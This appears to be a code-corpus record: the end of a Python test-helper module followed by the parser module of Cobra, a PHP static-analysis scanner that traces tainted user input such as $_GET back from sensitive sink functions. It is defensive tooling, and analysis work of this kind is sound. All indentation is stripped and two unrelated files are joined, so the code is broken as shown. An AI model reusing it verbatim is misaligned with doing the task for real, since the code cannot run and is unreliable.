        sys.stdout = self._old_stdout
@cache_utils.cache
def requires_attr(obj, attr):
"""Decorator used to skip tests if an object does not have the required
attribute.
"""
try:
getattr(obj, attr)
return lambda func: func
except AttributeError:
return unittest.skip('Required attribute "{}" not found on {}'.format(
attr, obj))
@cache_utils.cache
def requires_module(fullname):
"""Decorator used to skip tests if a module is not imported.
"""
if _can_import(fullname):
return lambda func: func
return unittest.skip('Unable to import "{}"'.format(fullname))
@cache_utils.cache
def requires_platform(name):
"""Decorator used to skip tests if not running on the given platform.
"""
if name == platform.system():
return lambda func: func
return unittest.skip(
'Required platform "{}" does not match system'.format(name))
@cache_utils.cache
def requires_python(version):
"""Decorator used to skip tests if the running Python version is not
greater or equal to the required version.
"""
if isinstance(version, str):
version = Version(version)
if _PYTHON_VERSION >= version:
return lambda func: func
return unittest.skip(
'Requires Python version {} or greater'.format(version))
|
py | b4001be9fddfa07b4a8a312134e54a9f8a56d3bf | # -*- coding: utf-8 -*-
"""
parser
~~~~~~
Implements Code Parser
:author: BlBana <[email protected]>
:homepage: https://github.com/wufeifei/cobra
:license: MIT, see LICENSE for more details.
:copyright: Copyright (c) 2017 Feei. All rights reserved
"""
from phply.phplex import lexer  # lexical analysis
from phply.phpparse import make_parser  # syntax analysis
from phply import phpast as php
from .log import logger
import re
import codecs
with_line = True
scan_results = []  # list that collects scan results
is_repair_functions = []  # list of sanitizing (repair) functions
def export(items):
result = []
if items:
for item in items:
if hasattr(item, 'generic'):
item = item.generic(with_lineno=with_line)
result.append(item)
return result
def export_list(params, export_params):
"""
    Flatten the lists nested inside params into a single list.
:param params:
:param export_params:
:return:
"""
for param in params:
if isinstance(param, list):
export_params = export_list(param, export_params)
else:
export_params.append(param)
return export_params
def get_all_params(nodes):  # get the argument list of a function call; nodes is the list of argument nodes
"""
    Get all parameters of a function structure.
:param nodes:
:return:
"""
params = []
export_params = [] # 定义空列表,用来给export_list中使用
for node in nodes:
if isinstance(node.node, php.FunctionCall): # 函数参数来自另一个函数的返回值
params = get_all_params(node.node.params)
else:
if isinstance(node.node, php.Variable):
params.append(node.node.name)
if isinstance(node.node, php.BinaryOp):
params = get_binaryop_params(node.node)
params = export_list(params, export_params)
if isinstance(node.node, php.ArrayOffset):
param = get_node_name(node.node.node)
params.append(param)
if isinstance(node.node, php.Cast):
param = get_cast_params(node.node.expr)
params.append(param)
if isinstance(node.node, php.Silence):
param = get_silence_params(node.node)
params.append(param)
return params
def get_silence_params(node):
"""
    Extract the parameters from a Silence node.
:param node:
:return:
"""
param = []
if isinstance(node.expr, php.Variable):
param = get_node_name(node.expr)
if isinstance(node.expr, php.FunctionCall):
param.append(node.expr)
if isinstance(node.expr, php.Eval):
param.append(node.expr)
if isinstance(node.expr, php.Assignment):
param.append(node.expr)
return param
def get_cast_params(node):
"""
    Extract the parameters from a Cast node.
:param node:
:return:
"""
param = []
if isinstance(node, php.Silence):
param = get_node_name(node.expr)
return param
def get_binaryop_params(node):  # for BinaryOp nodes, handle left and right separately and pull out the needed variables
    """
    Extract the parameters from a BinaryOp node.
:param node:
:return:
"""
# logger.debug('[AST] Binaryop --> {node}'.format(node=node))
params = []
buffer_ = []
if isinstance(node.left, php.Variable):
params.append(node.left.name)
else:
params = get_binaryop_deep_params(node.left, params)
if isinstance(node.right, php.Variable):
params.append(node.right.name)
else:
params = get_binaryop_deep_params(node.right, params)
params = export_list(params, buffer_)
return params
def get_binaryop_deep_params(node, params):  # when left/right are not plain variables, extract the variables inside the nested structure
    """
    Extract variable names from deeper levels of the tree.
    :param node: the node.left or node.right node from the previous step
:param params:
:return:
"""
if isinstance(node, php.ArrayOffset): # node为数组,取出数组变量名
param = get_node_name(node.node)
params.append(param)
if isinstance(node, php.BinaryOp): # node为BinaryOp,递归取出其中变量
param = get_binaryop_params(node)
params.append(param)
if isinstance(node, php.FunctionCall): # node为FunctionCall,递归取出其中变量名
params = get_all_params(node.params)
if isinstance(node, php.Constant):
params.append(node)
if type(node) is str:
params.append(node)
return params
def get_expr_name(node):  # expr is the value of the 'expr' field
    """
    Get the parameter name from the expression part of an assignment --> returned for taint backtracking
:param node:
:return:
"""
param_lineno = 0
is_re = False
if isinstance(node, php.ArrayOffset): # 当赋值表达式为数组
param_expr = get_node_name(node.node) # 返回数组名
param_lineno = node.node.lineno
elif isinstance(node, php.Variable): # 当赋值表达式为变量
param_expr = node.name # 返回变量名
param_lineno = node.lineno
elif isinstance(node, php.FunctionCall): # 当赋值表达式为函数
param_expr = get_all_params(node.params) # 返回函数参数列表
param_lineno = node.lineno
is_re = is_repair(node.name) # 调用了函数,判断调用的函数是否为修复函数
elif isinstance(node, php.BinaryOp): # 当赋值表达式为BinaryOp
param_expr = get_binaryop_params(node)
param_lineno = node.lineno
else:
param_expr = node
return param_expr, param_lineno, is_re
def get_node_name(node):  # node is the tuple stored in the 'node' field
    """
    Get the name of a Variable node.
:param node:
:return:
"""
if isinstance(node, php.Variable):
return node.name # 返回此节点中的变量名
if isinstance(node, php.ObjectProperty):
return node
def get_filename(node, file_path):  # get the filename
    """
    Get the filename referenced by an include/require node.
:param node:
:param file_path:
:return:
"""
filename = node.expr
filenames = []
if isinstance(filename, php.BinaryOp):
filenames = get_binaryop_params(filename)
elif type(filename) is str:
filenames = [filename]
for i in range(len(filenames)):
if isinstance(filenames[i], php.Constant):
constant_node = filenames[i]
constant_node_name = constant_node.name
f = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
file_content = f.read()
parser = make_parser()
all_nodes = parser.parse(file_content, debug=False, lexer=lexer.clone(), tracking=with_line)
for node in all_nodes:
if isinstance(node, php.FunctionCall) and node.name == "define":
define_params = node.params
if len(define_params) == 2 and define_params[0].node == constant_node_name:
filenames[i] = define_params[1].node
            if isinstance(filenames[i], php.Constant):  # the constant is still unresolved, skip it for now
                logger.warning("[AST] [INCLUDE FOUND] Can't find the constant {}, skipping it".format(filenames[i]))
filenames[i] = "not_found"
return filenames
def is_repair(expr):
"""
    Check whether a sanitizing function appears in the assignment expression; if it does, stop the taint backtrace and treat the vulnerability as fixed.
    :param expr: the assignment expression
:return:
"""
    is_re = False  # whether it has been sanitized; defaults to not sanitized
global is_repair_functions
if expr in is_repair_functions:
logger.debug("[AST] function {} in is_repair_functions, The vulnerability does not exist ")
is_re = True
return is_re
def is_sink_function(param_expr, function_params):
"""
    Check the input parameters of a user-defined function --> decide whether this function is a dangerous (sink) function.
:param param_expr:
:param function_params:
:return:
"""
is_co = -1
cp = None
if function_params is not None:
for function_param in function_params:
if param_expr == function_param:
is_co = 2
cp = function_param
logger.debug('[AST] is_sink_function --> {function_param}'.format(function_param=cp))
return is_co, cp
def is_controllable(expr, flag=None):  # take the variable from the expression and check whether it is in the list of user-controllable variables
    """
    Check whether the assignment expression is user-controllable.
:param expr:
:return:
"""
controlled_params = [
'$_GET',
'$_POST',
'$_REQUEST',
'$_COOKIE',
'$_FILES',
# '$_SERVER', # 暂时去掉了,误报率太高了
'$HTTP_POST_FILES',
'$HTTP_COOKIE_VARS',
'$HTTP_REQUEST_VARS',
'$HTTP_POST_VARS',
'$HTTP_RAW_POST_DATA',
'$HTTP_GET_VARS'
]
if isinstance(expr, php.ObjectProperty):
return 3, php.Variable(expr)
if isinstance(expr, php.New) or isinstance(expr, php.MethodCall) or isinstance(expr, php.FunctionCall):
return 3, php.Variable(expr)
if isinstance(expr, php.Variable):
expr = expr.name
if expr in controlled_params: # 当为可控变量时 返回1
logger.debug('[AST] is_controllable --> {expr}'.format(expr=expr))
if flag:
return 1, expr
return 1, php.Variable(expr)
try:
if expr.startswith("$"):
if flag:
return 3, expr
return 3, php.Variable(expr)
except AttributeError:
pass
except:
raise
return -1, php.Variable(expr)
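# Minimal sketch (editor addition): PHP superglobals such as $_GET are treated as
# user-controllable sources and yield code 1; other $-variables yield code 3.
def _example_is_controllable():
    code, _ = is_controllable('$_GET')
    return code  # 1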
# def function_deep_back(param, nodes, function_params): # 回溯函数定义位置
# """
# 递归回溯函数定义位置,传入param类型不同
# :param param:
# :param nodes:
# :return:
# """
# function_name = param.name
# is_co = 3
# cp = param
# expr_lineno = 0
# print nodes
# for node in nodes[::-1]:
# if isinstance(node, php.Function):
# if node.name == function_name:
# function_nodes = node.nodes
#
# # 进入递归函数内语句
# for function_node in function_nodes:
# if isinstance(function_node, php.Return):
# return_node = function_node.node
# return_param = return_node.node
# is_co, cp, expr_lineno = parameters_back(return_param, function_nodes, function_params)
#
# return is_co, cp, expr_lineno
def function_back(param, nodes, function_params, vul_function=None): # 回溯函数定义位置
"""
    Recursively trace back to where the function is defined; the type of the incoming param may differ.
:param function_params:
:param vul_function:
:param param:
:param nodes:
:return:
"""
function_name = param.name
is_co = 3
cp = param
expr_lineno = 0
for node in nodes[::-1]:
if isinstance(node, php.Function):
if node.name == function_name:
function_nodes = node.nodes
# 进入递归函数内语句
for function_node in function_nodes:
if isinstance(function_node, php.Return):
return_node = function_node.node
return_param = return_node.node
is_co, cp, expr_lineno = parameters_back(return_param, function_nodes, function_params,
vul_function=vul_function)
return is_co, cp, expr_lineno
def array_back(param, nodes, vul_function=None):  # trace back array definitions and assignments
    """
    Recursively trace back to where the array is defined and assigned.
:param vul_function:
:param param:
:param nodes:
:return:
"""
param_name = param.node.name
param_expr = param.expr
is_co = 3
cp = param
expr_lineno = 0
# print nodes
for node in nodes[::-1]:
if isinstance(node, php.Assignment):
param_node_name = get_node_name(node.node)
param_node = node.node
param_node_expr = node.expr
if param_node_name == param_name: # 处理数组中值被改变的问题
if isinstance(node.expr, php.Array):
for p_node in node.expr.nodes:
if p_node.key == param_expr:
if isinstance(p_node.value, php.ArrayOffset): # 如果赋值值仍然是数组,先经过判断在进入递归
is_co, cp = is_controllable(p_node.value.node.name)
if is_co != 1:
is_co, cp, expr_lineno = array_back(param, nodes)
else:
n_node = php.Variable(p_node.value)
is_co, cp, expr_lineno = parameters_back(n_node, nodes, vul_function=vul_function)
if param == param_node: # 处理数组一次性赋值,左值为数组
if isinstance(param_node_expr, php.ArrayOffset): # 如果赋值值仍然是数组,先经过判断在进入递归
is_co, cp = is_controllable(param_node_expr.node.name)
if is_co != 1:
is_co, cp, expr_lineno = array_back(param, nodes)
else:
is_co, cp = is_controllable(param_node_expr)
if is_co != 1 and is_co != -1:
n_node = php.Variable(param_node_expr.node.value)
is_co, cp, expr_lineno = parameters_back(n_node, nodes, vul_function=vul_function)
return is_co, cp, expr_lineno
def class_back(param, node, lineno, vul_function=None):
"""
    Trace back a variable inside a class.
:param vul_function:
:param param:
:param node:
:param lineno:
:return:
"""
class_name = node.name
class_nodes = node.nodes
vul_nodes = []
for class_node in class_nodes:
if class_node.lineno < int(lineno):
vul_nodes.append(class_node)
is_co, cp, expr_lineno = parameters_back(param, vul_nodes, lineno=lineno, vul_function=vul_function)
if is_co == 1 or is_co == -1: # 可控或者不可控,直接返回
return is_co, cp, expr_lineno
elif is_co == 3:
for class_node in class_nodes:
if isinstance(class_node, php.Method) and class_node.name == '__construct':
class_node_params = class_node.params
constructs_nodes = class_node.nodes
# 递归析构函数
is_co, cp, expr_lineno = parameters_back(param, constructs_nodes, function_params=class_node_params,
lineno=lineno, vul_function=vul_function)
if is_co == 3:
# 回溯输入参数
for param in class_node_params:
if param.name == cp.name:
logger.info(
"[Deep AST] Now vulnerability function in class from class {}() param {}".format(
class_name, cp.name))
is_co = 4
cp = tuple([node, param, class_node_params])
return is_co, cp, 0
return is_co, cp, expr_lineno
def new_class_back(param, nodes, vul_function=None):
"""
    Analyze a newly instantiated class and automatically step into its __toString method.
:param vul_function:
:param param:
:param nodes:
:return:
"""
param = param.name
param_name = param.name
param_params = param.params
is_co = -1
cp = param
expr_lineno = 0
for node in nodes:
if isinstance(node, php.Class) and param_name == node.name:
class_nodes = node.nodes
for class_node in class_nodes:
if isinstance(class_node, php.Method) and class_node.name == '__toString':
tostring_nodes = class_node.nodes
logger.debug("[AST] try to analysize class {}() function tostring...".format(param_name))
for tostring_node in tostring_nodes:
if isinstance(tostring_node, php.Return):
return_param = tostring_node.node
is_co, cp, expr_lineno = parameters_back(return_param, tostring_nodes,
vul_function=vul_function)
return is_co, cp, expr_lineno
else:
is_co = 3
cp = php.Variable(param)
return is_co, cp, expr_lineno
def parameters_back(param, nodes, function_params=None, lineno=0,
                    function_flag=0, vul_function=None):  # checks whether a variable assigned during backtracking equals the sensitive-function variable; param is the taint currently being tracked
"""
    Recursively trace the assignment flow feeding the sensitive function. param is the taint being tracked; when its source is found --> analyze the assignment expression --> obtain the new taint; otherwise recurse into the next node.
:param vul_function:
:param param:
:param nodes:
:param function_params:
:param lineno
:param function_flag: 是否在函数、方法内的标志位
:return:
"""
if isinstance(param, php.FunctionCall) or isinstance(param, php.MethodCall): # 当污点为寻找函数时,递归进入寻找函数
logger.debug("[AST] AST analysis for FunctionCall or MethodCall {} in line {}".format(param.name, param.lineno))
is_co, cp, expr_lineno = function_back(param, nodes, function_params)
return is_co, cp, expr_lineno
if isinstance(param, php.ArrayOffset): # 当污点为数组时,递归进入寻找数组声明或赋值
logger.debug("[AST] AST analysis for ArrayOffset in line {}".format(param.lineno))
is_co, cp, expr_lineno = array_back(param, nodes)
return is_co, cp, expr_lineno
if isinstance(param, php.New) or (hasattr(param, "name") and isinstance(param.name, php.New)): # 当污点为新建类事,进入类中tostring函数分析
logger.debug("[AST] AST analysis for New Class {} in line {}".format(param.name, param.lineno))
is_co, cp, expr_lineno = new_class_back(param, nodes)
return is_co, cp, expr_lineno
expr_lineno = 0 # source所在行号
if hasattr(param, "name"):
# param_name = param.name
param_name = get_node_name(param)
else:
param_name = param
is_co, cp = is_controllable(param_name)
if len(nodes) != 0:
node = nodes[len(nodes) - 1]
if isinstance(node, php.Assignment): # 回溯的过程中,对出现赋值情况的节点进行跟踪
param_node = get_node_name(node.node) # param_node为被赋值的变量
param_expr, expr_lineno, is_re = get_expr_name(node.expr) # param_expr为赋值表达式,param_expr为变量或者列表
if param_name == param_node and is_re is True:
is_co = 2
cp = param
return is_co, cp, expr_lineno
if param_name == param_node and not isinstance(param_expr, list): # 找到变量的来源,开始继续分析变量的赋值表达式是否可控
logger.debug(
"[AST] Find {}={} in line {}, start ast for param {}".format(param_name, param_expr, expr_lineno,
param_expr))
is_co, cp = is_controllable(param_expr) # 开始判断变量是否可控
if is_co != 1 and is_co != 3:
is_co, cp = is_sink_function(param_expr, function_params)
if isinstance(node.expr, php.ArrayOffset):
param = node.expr
else:
param = php.Variable(param_expr) # 每次找到一个污点的来源时,开始跟踪新污点,覆盖旧污点
if param_name == param_node and isinstance(node.expr, php.FunctionCall): # 当变量来源是函数时,处理函数内容
function_name = node.expr.name
param = node.expr # 如果没找到函数定义,则将函数作为变量回溯
logger.debug(
"[AST] Find {} from FunctionCall for {} in line {}, start ast in function {}".format(param_name,
function_name,
node.lineno,
function_name))
for node in nodes[::-1]:
if isinstance(node, php.Function):
if node.name == function_name:
function_nodes = node.nodes
# 进入递归函数内语句
for function_node in function_nodes:
if isinstance(function_node, php.Return):
return_node = function_node.node
return_param = return_node.node
is_co, cp, expr_lineno = parameters_back(return_param, function_nodes,
function_params, lineno, function_flag=1,
vul_function=vul_function)
if param_name == param_node and isinstance(param_expr, list):
logger.debug(
"[AST] Find {} from list for {} in line {}, start ast for list {}".format(param_name,
param_expr,
node.lineno,
param_expr))
for expr in param_expr:
param = expr
is_co, cp = is_controllable(expr)
if is_co == 1:
return is_co, cp, expr_lineno
param = php.Variable(param)
_is_co, _cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1, vul_function=vul_function)
if _is_co != -1: # 当参数可控时,值赋给is_co 和 cp,有一个参数可控,则认定这个函数可能可控
is_co = _is_co
cp = _cp
elif isinstance(node, php.Function) or isinstance(node, php.Method) and function_flag == 0:
function_nodes = node.nodes
function_lineno = node.lineno
function_params = node.params
vul_nodes = []
logger.debug(
"[AST] param {} line {} in function {} line {}, start ast in function".format(param_name,
node.lineno,
node.name,
function_lineno))
for function_node in function_nodes:
if function_node is not None and int(function_lineno) <= function_node.lineno < int(lineno):
vul_nodes.append(function_node)
if len(vul_nodes) > 0:
is_co, cp, expr_lineno = parameters_back(param, function_nodes, function_params, function_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3: # 出现新的敏感函数,重新生成新的漏洞结构,进入新的遍历结构
for node_param in node.params:
if node_param.name == cp.name:
logger.debug(
"[AST] param {} line {} in function_params, start new rule for function {}".format(
param_name, node.lineno, node.name))
if vul_function is None or node.name != vul_function:
logger.info(
"[Deep AST] Now vulnerability function from function {}() param {}".format(node.name,
cp.name))
is_co = 4
cp = tuple([node, param])
return is_co, cp, 0
else:
logger.info(
"[Deep AST] Recursive problems may exist in the code, exit the new rules generated..."
)
# 无法解决递归,直接退出
is_co = -1
return is_co, cp, 0
elif isinstance(node, php.Class):
is_co, cp, expr_lineno = class_back(param, node, lineno, vul_function=vul_function)
return is_co, cp, expr_lineno
elif isinstance(node, php.If):
logger.debug(
"[AST] param {} line {} in if/else, start ast in if/else".format(param_name, node.lineno))
if isinstance(node.node, php.Block): # if里可能是代码块,也可能就一句语句
if_nodes = node.node.nodes
if_node_lineno = node.node.lineno
elif node.node is not None:
if_nodes = [node.node]
if_node_lineno = node.node.lineno
else:
if_nodes = []
if_node_lineno = 0
# 进入分析if内的代码块,如果返回参数不同于进入参数,那么在不同的代码块中,变量值不同,不能统一处理,需要递归进入不同的部分
is_co, cp, expr_lineno = parameters_back(param, if_nodes, function_params, if_node_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3 and cp != param: # 理由如上
is_co, cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1, vul_function=vul_function) # 找到可控的输入时,停止递归
return is_co, cp, expr_lineno
            if is_co != 1 and node.elseifs != []:  # there may be several elseif branches, so it is a list
for node_elseifs_node in node.elseifs:
if isinstance(node_elseifs_node.node, php.Block):
elif_nodes = node_elseifs_node.node.nodes
elif_node_lineno = node_elseifs_node.node.lineno
elif node_elseifs_node.node is not None:
elif_nodes = [node_elseifs_node.node]
elif_node_lineno = node_elseifs_node.node.lineno
else:
elif_nodes = []
elif_node_lineno = 0
is_co, cp, expr_lineno = parameters_back(param, elif_nodes, function_params, elif_node_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3 and cp != param: # 理由如上
is_co, cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1,
vul_function=vul_function) # 找到可控的输入时,停止递归
return is_co, cp, expr_lineno
else:
break
            if is_co != 1 and node.else_ != [] and node.else_ is not None:
if isinstance(node.else_.node, php.Block):
else_nodes = node.else_.node.nodes
else_node_lineno = node.else_.node.lineno
elif node.else_.node is not None:
else_nodes = [node.else_.node]
else_node_lineno = node.else_.node.lineno
else:
else_nodes = []
else_node_lineno = 0
is_co, cp, expr_lineno = parameters_back(param, else_nodes, function_params, else_node_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3 and cp != param: # 理由如上
is_co, cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1,
vul_function=vul_function) # 找到可控的输入时,停止递归
return is_co, cp, expr_lineno
elif isinstance(node, php.For):
for_nodes = node.node.nodes
for_node_lineno = node.node.lineno
logger.debug(
"[AST] param {} line {} in for, start ast in for".format(param_name, for_node_lineno))
is_co, cp, expr_lineno = parameters_back(param, for_nodes, function_params, for_node_lineno,
function_flag=1, vul_function=vul_function)
if is_co == 3 or int(lineno) == node.lineno: # 当is_co为True时找到可控,停止递归
is_co, cp, expr_lineno = parameters_back(param, nodes[:-1], function_params, lineno,
function_flag=1, vul_function=vul_function) # 找到可控的输入时,停止递归
elif len(nodes) == 0 and function_params is not None: # 当敏感函数在函数中时,function_params不为空,这时应进入自定义敏感函数逻辑
for function_param in function_params:
if function_param == param:
logger.debug(
"[AST] param {} in function_params, start new rule".format(param_name))
is_co = 2
cp = function_param
return is_co, cp, expr_lineno
def deep_parameters_back(param, back_node, function_params, count, file_path, lineno=0, vul_function=None):
"""
    Deep recursive traversal that follows include/require statements into other files.
:param vul_function:
:param lineno:
:param param:
:param back_node:
:param function_params:
:param file_path:
:return:
"""
count += 1
is_co, cp, expr_lineno = parameters_back(param, back_node, function_params, lineno, vul_function=vul_function)
if count > 20:
logger.warning("[Deep AST] depth too big, auto exit...")
return is_co, cp, expr_lineno
if is_co == 3:
logger.debug("[Deep AST] try to find include, start deep AST for {}".format(cp))
for node in back_node[::-1]:
if isinstance(node, php.Include):
# 拼接路径需要专门处理,暂时先这样
filename = get_filename(node, file_path)
file_path_list = re.split(r"[\/\\]", file_path)
file_path_list.pop()
file_path_list += filename
if "not_found" in filename:
continue
file_path_name = "/".join(file_path_list)
try:
logger.debug("[Deep AST] open new file {file_path}".format(file_path=file_path_name))
# f = open(file_path_name, 'r')
f = codecs.open(file_path_name, "r", encoding='utf-8', errors='ignore')
file_content = f.read()
except:
logger.warning("[Deep AST] error to open new file...continue")
continue
parser = make_parser()
all_nodes = parser.parse(file_content, debug=False, lexer=lexer.clone(), tracking=with_line)
node = cp
# node = php.Variable(cp)
is_co, cp, expr_lineno = deep_parameters_back(node, all_nodes, function_params, count, file_path_name,
lineno, vul_function=vul_function)
if is_co == -1:
break
return is_co, cp, expr_lineno
def get_function_node(nodes, s_lineno, e_lineno):
"""
    Get the nodes at the specified lines from the node list.
:param nodes:
:param s_lineno:
:param e_lineno:
:return:
"""
result = []
for node in nodes:
if node.lineno == e_lineno:
result.append(node)
break
if node.lineno == s_lineno:
result.append(node)
return result
def get_function_params(nodes):
"""
    Get all input parameters of a user-defined function.
    :param nodes: the parameter section of the user-defined function
    :return: all input parameters as a list
"""
params = []
for node in nodes:
if isinstance(node, php.FormalParameter):
params.append(node.name)
return params
def anlysis_params(param, code_content, file_path, lineno, vul_function=None, repair_functions=None):
"""
    Intermediate data pre-processing for calls coming from cast.
:param repair_functions:
:param vul_function:
:param lineno:
:param param:
:param code_content:
:param file_path:
:return:
"""
global is_repair_functions
count = 0
function_params = None
if repair_functions is not None:
is_repair_functions = repair_functions
if type(param) is str and "->" in param:
param_left = php.Variable(param.split("->")[0])
param_right = param.split("->")[1]
param = php.ObjectProperty(param_left, param_right)
param = php.Variable(param)
parser = make_parser()
all_nodes = parser.parse(code_content, debug=False, lexer=lexer.clone(), tracking=with_line)
# 做一次处理,解决Variable(Variable('$id'))的问题
while isinstance(param.name, php.Variable):
param = param.name
logger.debug("[AST] AST to find param {}".format(param))
vul_nodes = []
for node in all_nodes:
if node is not None and node.lineno <= int(lineno):
vul_nodes.append(node)
is_co, cp, expr_lineno = deep_parameters_back(param, vul_nodes, function_params, count, file_path, lineno,
vul_function=vul_function)
return is_co, cp, expr_lineno
def anlysis_function(node, back_node, vul_function, function_params, vul_lineno, file_path=None):
"""
    Analyze a user-defined function --> get its input parameters --> if an input parameter flows through assignments into a sink function, this user-defined function is itself treated as dangerous.
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param function_params:
:param vul_lineno:
:return:
"""
global scan_results
try:
if node.name == vul_function and int(node.lineno) == int(vul_lineno): # 函数体中存在敏感函数,开始对敏感函数前的代码进行检测
for param in node.params:
if isinstance(param.node, php.Variable):
analysis_variable_node(param.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(param.node, php.FunctionCall):
analysis_functioncall_node(param.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(param.node, php.BinaryOp):
analysis_binaryop_node(param.node, back_node, vul_function, vul_lineno, function_params,
file_path=file_path)
if isinstance(param.node, php.ArrayOffset):
analysis_arrayoffset_node(param.node, vul_function, vul_lineno)
except Exception as e:
logger.debug(e)
def analysis_functioncall(node, back_node, vul_function, vul_lineno):
"""
    Handle a FunctionCall --> check whether the called function is sensitive --> collect all its parameters --> start the recursive check.
:param node:
:param back_node:
:param vul_function:
:param vul_lineno
:return:
"""
global scan_results
try:
if node.name == vul_function and int(node.lineno) == int(vul_lineno): # 定位到敏感函数
for param in node.params:
if isinstance(param.node, php.Variable):
analysis_variable_node(param.node, back_node, vul_function, vul_lineno)
if isinstance(param.node, php.FunctionCall):
analysis_functioncall_node(param.node, back_node, vul_function, vul_lineno)
if isinstance(param.node, php.BinaryOp):
analysis_binaryop_node(param.node, back_node, vul_function, vul_lineno)
if isinstance(param.node, php.ArrayOffset):
analysis_arrayoffset_node(param.node, vul_function, vul_lineno)
except Exception as e:
logger.debug(e)
def analysis_binaryop_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
    Handle a BinaryOp node --> extract its parameters --> backtrack to decide whether they are controllable --> record the result.
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
params = get_binaryop_params(node)
params = export_list(params, export_params=[])
for param in params:
param = php.Variable(param)
param_lineno = node.lineno
# is_co, cp, expr_lineno = parameters_back(param, back_node, function_params)
if file_path is not None:
# with open(file_path, 'r') as fi:
fi = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
code_content = fi.read()
is_co, cp, expr_lineno = anlysis_params(param, code_content, file_path, param_lineno,
vul_function=vul_function)
else:
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node, back_node, function_params, count, file_path,
vul_function=vul_function)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_objectproperry_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
    Handle an ObjectProperty node --> extract its parameters --> backtrack to decide whether they are controllable --> record the result.
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
param = node
param_lineno = node.lineno
# is_co, cp, expr_lineno = parameters_back(param, back_node, function_params)
if file_path is not None:
# with open(file_path, 'r') as fi:
fi = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
code_content = fi.read()
is_co, cp, expr_lineno = anlysis_params(param, code_content, file_path, param_lineno, vul_function=vul_function)
else:
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node, back_node, function_params, count,
vul_function=vul_function)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_arrayoffset_node(node, vul_function, vul_lineno):
"""
    Handle an ArrayOffset node --> extract its parameters --> backtrack to decide whether they are controllable --> record the result.
:param node:
:param vul_function:
:param vul_lineno:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
param = get_node_name(node.node)
expr_lineno = node.lineno
is_co, cp = is_controllable(param)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_functioncall_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
    Handle a FunctionCall node --> extract its parameters --> backtrack to decide whether they are controllable --> record the result.
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
params = get_all_params(node.params)
for param in params:
param = php.Variable(param)
param_lineno = node.lineno
# is_co, cp, expr_lineno = parameters_back(param, back_node, function_params)
if file_path is not None:
# with open(file_path, 'r') as fi:
fi = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
code_content = fi.read()
is_co, cp, expr_lineno = anlysis_params(param, code_content, file_path, param_lineno,
vul_function=vul_function)
else:
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node, back_node, function_params, count, file_path,
vul_function=vul_function)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_variable_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
"""
    Handle a Variable node --> extract the parameter --> backtrack to decide whether it is controllable --> record the result.
:param file_path:
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
param = get_node_name(node)
param_lineno = node.lineno
if file_path is not None:
# with open(file_path, 'r') as fi:
fi = codecs.open(file_path, 'r', encoding='utf-8', errors='ignore')
code_content = fi.read()
is_co, cp, expr_lineno = anlysis_params(param, code_content, file_path, param_lineno, vul_function=vul_function)
else:
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node, back_node, function_params, count, file_path,
vul_function=vul_function)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_ternaryop_node(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None,
repair_functions=[]):
"""
    Handle a ternary conditional expression by backtracking both of its branches.
:param node:
:param back_node:
:param vul_function:
:param vul_lineno:
:param function_params:
:param file_path:
:return:
"""
logger.debug('[AST] vul_function:{v}'.format(v=vul_function))
param = node.expr
node1 = node.iftrue
node2 = node.iffalse
if type(node1) is int:
node1 = php.Variable(node1)
if type(node2) is int:
node2 = php.Variable(node2)
logger.debug('[AST] vul_param1: {}, vul_param2: {}'.format(node1, node2))
count = 0
is_co, cp, expr_lineno = deep_parameters_back(node1, back_node, function_params, count, file_path)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
is_co, cp, expr_lineno = deep_parameters_back(node2, back_node, function_params, count, file_path)
set_scan_results(is_co, cp, expr_lineno, vul_function, param, vul_lineno)
def analysis_if_else(node, back_node, vul_function, vul_lineno, function_params=None, file_path=None):
nodes = []
if isinstance(node.node, php.Block): # if语句中的sink点以及变量
analysis(node.node.nodes, vul_function, back_node, vul_lineno, file_path, function_params)
else:
analysis([node.node], vul_function, back_node, vul_lineno, file_path, function_params)
if node.else_ is not None: # else语句中的sink点以及变量
if isinstance(node.else_.node, php.Block):
analysis(node.else_.node.nodes, vul_function, back_node, vul_lineno, file_path, function_params)
else:
